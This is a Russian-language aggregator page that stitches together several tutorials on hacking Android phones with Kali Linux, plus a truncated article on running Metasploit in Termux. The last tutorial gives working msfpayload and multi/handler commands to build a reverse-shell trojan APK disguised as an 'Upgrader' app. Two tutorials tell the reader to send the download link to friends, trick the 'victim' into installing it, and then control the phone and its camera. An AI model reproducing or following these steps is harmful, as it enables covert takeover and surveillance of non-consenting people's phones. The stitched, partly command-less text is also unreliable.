Меню Рубрики

Взлом android kali linux

Краткое руководство: Как взломать андроид с Kali Linux

Главное меню » Операционная система Linux » Краткое руководство: Как взломать андроид с Kali Linux

Предпосылки для взлома Android

  1. Kali Linux
  2. Android телефон: Для демонстрационных целей использовался Android emulator предоставленный Google.

Шаги для взлома Android

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

с. Проверьте apk, созданный с помощью jarsigner.

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

Теперь позвольте оптимизировать apk.

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

Взлом android через kali linux (Удалёный доступ)

Шаг первый — Запуск Kali Linux

Открываем Терминал и создаем trojan apk-приложение
Для этого напишите следующую команду:

Шаг второй — Открываем второй терминал

Пока файл создается,откройте второй терминал
Загрузите консоль metasploit, набрав в терминале:

Шаг третий — настройка Listener (слушателя)

После загрузки (потребуется время) загрузите эксплойт с несколькими обработчиками, набрав:

Установите ваш IP в качестве значения LHOST 192.168.0.4

Шаг четвёртый — Exploit!

Пропишите эту команду, чтобы запустить слушателя (listener) :

Скопируйте приложение, которое вы создали (Upgrader.apk) из корневой папки, на Android-телефон.

Затем отправьте его на любой файлообменик (например:)

Затем отправьте ссылку, которую вам дал ФО, своим друзьям и как только они запустят ваше приложение, вы получите удаленный доступ к их телефонам! (работает только в локальной сети)

Запустится консоль meterpreter , с помощью, которой вы можете управлять телефоном, команды для meterpreter, вы с легкостью сможете найти в Интернете , пробуем включить его камеру с помощью одной из таких команд:

Источник

Боевой смартфон. Делаем из устройства с Android «хакерфон» с помощью Termux и Kali

Содержание статьи

Что нужно знать и сделать перед установкой

Первое, о чем следует позаботиться, — это права root. Без них некоторые функции установленных нами утилит могут не поддерживаться или работать некорректно. Поэтому настоятельно рекомендую их заполучить. Особенно это касается пользователей с Android 10 и более поздних версий.

Получение root в каждом случае уникально, ведь оно напрямую зависит от конкретной модели устройства и версии Android. Я в этой статье буду использовать свой старенький Samsung Galaxy S6 (SM-G920F) на Android 7.0 Nougat, для рута в котором уже есть специальный инструмент. В остальных случаях придется погуглить и узнать, как получить рут конкретно на твоем устройстве. На форуме 4PDA почти всегда есть нужная инструкция.

Также нам понадобится Termux — простой и удобный терминал, дающий многие возможности среды Linux, который и позволит исполнять наши команды в подходящей среде и не возиться с предварительной настройкой окружения.

Рекомендую также установить утилиту tsu, которая предоставит тебе возможность выполнять команды от рута. Если она не работает должным образом, загляни в GitHub-репозиторий, который настраивает работу рута в Termux. Это нужно, чтобы Termux сразу имел рут-доступ, который может понадобиться для дальнейших операций.

Важный момент: при использовании в качестве рута Magisk (а на большинстве современных устройств альтернатив нет и не предвидится) не забудь в его настройках разрешить Termux рут-доступ, а также добавить в исключения для Magisk Hide, иначе все наши действия будут бесполезны.

Также рекомендую обновить список пакетов, как мы обычно делаем это в десктопе Kali:

Пара слов о Kali NetHunter

Если ты один из тех счастливчиков, чье устройство оказалось в списке поддерживаемых, рекомендую попробовать Kali NetHunter. Это платформа, созданная разработчиками Kali Linux специально для телефонов на Android. В NetHunter сразу доступно много рабочего софта из десктопной версии Kali. Образы можно найти на официальном сайте. Это более мощный набор, чем тот, что ты можешь получить с помощью Termux.

Устанавливаем Metasploit

Полное описание Metasploit — тема для отдельной статьи, поэтому пройдемся по нему вкратце. Metasploit Framework — фреймворк, предназначенный для создания, отладки и, конечно, применения эксплоитов.

Установить Metasploit Framework (MSF) на Android 7 или выше можно в две команды:

На Android 5.x.x–6.x.x MSF устанавливают несколько другим методом:

WARNING

Все эти команды следует выполнять с правами обычного пользователя, если не оговорено иное: при выполнении от рута могут возникать трудноисправимые проблемы.

В частности, при запуске apt от рута мы получим сбитые контексты SELinux, что потом помешает нам устанавливать пакеты.

Установка может затянуться. Не закрывай сессию Termux до конца установки MSF!

WARNING

Не стоит обновлять MSF вручную редактированием $PREFIX/opt/metasploit , так как это может привести к проблемам с зависимостями.

Теперь, чтобы убедиться, что у нас все работает, запустим Metasploit:

Metasploit Framework

Как видишь, все отлично и в твоем распоряжении 2014 эксплоитов. 🙂

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Источник

Как удаленно взломать Android с помощью Kali

Привет, хакеры! Добро пожаловать на наш сайт.
В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете.

Шаг 1. Запустите Кали

  • Откройте терминал, и создайте файл Trojan.apk
  • Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (замените LHOST своим собственным IP-адресом)
  • Вы также можете взломать Android через WAN, то есть через Interet, используя ваш общедоступный/внешний IP-адрес в параметре LHOST и пробросом портов (если вам не понятно, что такое «проброс портов» — напишите об этом комментарий).

Шаг 2. Откройте другой терминал

  • Пока файл генерируется, откройте другой терминал.
  • Загрузите консоль metasploit, набрав: msfconsole

Шаг 3. Установите «прослушивателя»

  • После того, как msfconsole запустится (потребуется некоторое время) загрузите multi-handler эксплоит, набрав в консоли: use exploit/multi/handler

  • Установите реверсивную полезную нагрузку, набрав: set payload android/meterpreter/reverse_tcp
  • Чтобы установить тип L-хоста: установите LHOST 192.168.0.4 (Даже если вы взламываете WAN, указывайте здесь ваш частный/внутренний IP-адрес, а не публичный/внешний).

Шаг 4. Эксплуатируйте!

  • Наконец, для запуска «прослушивателя» введите в консоли: exploit.
  • Копируйте приложение, которое вы создали (Upgrader.apk) из корневой папки на ваш Android-телефон.

  • Затем отправьте его в Dropbox или на любой файлообменник (например: www.speedyshare.com).
  • Затем отправьте ссылку, которую этот сервис вам дал, вашим друзьям и эксплуатируйте их телефоны (только в локальной сети, но если вы использовали метод WAN, то вы можете использовать этот эксплоит из любого места в Интернете)

  • Пусть жертва установит приложение Upgrader (поскольку он будет думать, что он предназначен для обновления некоторых функций на его телефоне).
  • Однако в настройках безопасности Android-телефона опция разрешения на установку приложений из неизвестных источников должна быть включена, чтобы можно было установить ваш троянец.
  • И когда он нажимает «Открыть» …

Шаг 5. БУМ!

Появляется вывод meterpreter:

Конец

Обязательно приходите за добавкой!
Некоторые почтовые модули, которые работают для Windows, могут не работать в android
Например: run killav, persistence (бэкдор) и т.д.

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

  • Часы для mac os заставка
  • Цивилизация для mac os
  • Хронология операционных систем mac os
  • Хранение фотографий в mac os
  • Хоррор игры на mac os